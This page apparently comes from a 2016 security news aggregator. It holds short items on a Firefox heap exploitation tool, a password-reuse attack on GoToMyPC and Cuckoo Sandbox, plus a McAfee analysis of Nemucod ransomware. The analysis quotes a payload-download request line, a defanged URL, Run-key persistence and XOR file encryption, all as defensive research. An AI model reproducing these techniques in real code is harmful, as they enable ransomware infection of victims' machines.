Category: Security

Jun 21 2016

shadow – Firefox Heap Exploitation Tool (jemalloc)

shadow is a new, extended (and renamed version) of a Firefox heap exploitation tool, which is quite a swiss army knife for Firefox/jemalloc heap exploitation. If you want to dive in really deep to this tool, and the technicalities behind it check this out – OR’LYEH? The Shadow over Firefox [PDF] Support shadow has been […] The post shadow...

Read the full post at
Jun 20 2016

JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware

The ransomware Nemucod has been very prevalent in the last few months. Nemucod’s habit of frequently changing its delivery mechanism and infection vector to evade detection makes this threat very challenging to security researchers. Recently, we observed in the wild a new variant of Nemucod that shows another change. This variant downloads a PHP file along with other files. All together these payloads encrypt the victim’s machine. (You can read more about Nemucod in this McAfee Labs Threat Advisory.)

The malware’s spreading mechanism is the same as in previous versions. It arrives in a spam email with a ZIP attachment. The contents of the spam email are crafted using social engineering techniques to lure victims. The JavaScript inside the ZIP is highly obfuscated and is very tough to understand at first. The last few lines of the script (hash: 0316CC3EBA6175E27049EB1C979C2D99) look like this:


Once we deobfuscated the JavaScript, we found readable strings inside. To help understanding, we have divided the script into separate steps.

Assigning the variables:


A unique long string is assigned to a variable used later to construct the URL that downloads the malicious payload. Here we can see five domain names assigned as an array that also will be part of making the URL. The ExpandEnvironmentStrings method gets the %TEMP% location for storing the downloaded payloads.

Downloading the malicious payload:


The malware checks for a.txt in the %TEMP% folder before proceeding. If the file is present, the malware will stop. Otherwise, it uses a “for loop” to construct the URL and download the payloads.

Let’s look into this process for i=0 (because i=id and id=0) and n=1. The malware prepares the HTTP GET request in line 19 (preceding screen) and sends a synchronous HTTP request."GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false);

This line resembles the following address:

hxxp:// c5Jzzaa6WhF1OaBDyD_7aoT6MtP68oT1N1Gj36WpPLjg0VeFz1fMonKZ6ZeJJpqJJWF y4u5HtbBxToPGGh5vO5vYsHh9fNB&rnd=01

From this address the malware tries to download three binaries plus one PHP and one DLL files:

  • a.exe (hash: 9F13CC0B1B3B03CBEFD8141E5F50B1C1)
  • a1.exe (hash: 9C24738B403973653B6634C9299284FB)
  • a2.exe (hash: 149640B09DC390A881EBBAFD54B7853A)
  • php4ts.dll (hash: 106FFA7E8342890798F1AE110F763471)
  • a.php (hash: B670BF0C481146C52EBE5FBD87879960).

In the same fashion the malware constructs five URLs and tries to download the five payloads to the %TEMP% location.

The downloaded payload a.exe is the official PHP interpreter.



Registry key modifications and deleting files:


We further deobfuscated the script and found more readable strings:


Now we can see that a.exe accepts the a.php script. This a.exe is solely a PHP interpreter. For the execution of a.php, the malware uses php4ts.dll and a.exe as the dependencies.

The process also adds “.Crypted” registry names under HKEY_CURRENT_USER Run and HKEY_CLASSES_ROOT Run to start the .txt startup. After infecting the system, the malware deletes the payloads a.php, a.exe, and php4ts.dll.

The ransom note:


Once the payloads are downloaded, the file a.txt is created on the desktop and is later renamed DECRYPT.txt, which contains the ransom note. Lines 49 to 87, above, create the ransom note.

The PHP script:


In line 3 the PHP script uses set_time_limit(0) to remove time restrictions and keep the script running as long as it wants. This script uses only one major function, Tree(), which makes calls within the loop. The “for loop” checks for the directory chr(67) [C] to chr(90) [Z] with the help of the is_dir() function. Inside the Tree() function, the variable $k contains a hardcoded Base64-encoded string that encrypts the file. Then the malware uses the preg_match() function to perform a regular expression match to check if the path passed as an argument to the function contains any terms as shown in line 13 above. The function checks for certain folder names in the root directories.

The malware iterates until it finds a match. After a successful match, it checks the hardcoded extensions using the preg_match() function, on line 25, and encrypts them with the extension .crypted. On line 31 we see the encryption process using a single-byte XOR with the variable $k.

The ransom note requires the payment of 0.37070 Bitcoins to restore the files. The victim first has to pay and then enable the link to the decryption.


Intel Security advises users to keep their antimalware signatures up to date at all times. Intel Security products detect this malicious JavaScript and the payload, respectively, as JS/Nemucod, and PHP/Ransom.a and Trojan-FIWO! with DAT Versions 8199 and later.

The post JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware appeared first on McAfee.

Jun 20 2016

Citing Attack, GoToMyPC Resets All Passwords

GoToMyPC, a service that helps people access and control their computers remotely over the Internet, is forcing all users to change their passwords, citing a spike in attacks that target people who re-use passwords across multiple sites.

gtpcOwned by Santa Clara, Calif. based networking giant Citrix, GoToMyPC is a popular software-as-a-service product that lets users access and control their PC or Mac from anywhere in the world. On June 19, the company posted a status update and began notifying users that a system-wide password update was underway.

“Unfortunately, the GoToMYPC service has been targeted by a very sophisticated password attack,” reads the notice posted to “To protect you, the security team recommended that we reset all customer passwords immediately. Effective immediately, you will be required to reset your GoToMYPC password before you can login again. To reset your password please use your regular GoToMYPC login link.”

John Bennett, product line director at Citrix, said once the company learned about the attack it took immediate action. But contrary to previous published reports, there is no indication Citrix or its platforms have been compromised, he said.

“Citrix can confirm the recent incident was a password re-use attack, where attackers used usernames and passwords leaked from other websites to access the accounts of GoToMyPC users,” Bennett wrote in an emailed statement. “At this time, the response includes a mandatory password reset for all GoToMyPC users. Citrix encourages customers to visit the  GoToMyPC status page to learn about enabling two-step verification, and to use strong passwords in order to keep accounts as safe as possible. ”

Citrix’s GoTo division also operates GoToAssist, which is geared toward technical support specialists, and GoToMeeting, a product marketed at businesses. The company said it has no indication that user accounts at other GoTo services were compromised, but assuming that’s true it’s likely because the attackers haven’t gotten around to trying yet.

It’s a fair bet that whoever perpetrated this attack had help from huge email and password lists recently leaked online from older breaches at LinkedIn, MySpace and Tumblr to name a few. Re-using passwords at multiple sites is a bad idea to begin with, but re-using your GoToMyPC remote administrator password at other sites seems like an exceptionally lousy idea.

Jun 18 2016

Cuckoo Sandbox – Automated Malware Analysis System

Cuckoo Sandbox is Open Source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behaviour of the malicious processes while running in an isolated environment. In other words, you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide […] The post...

Read the full post at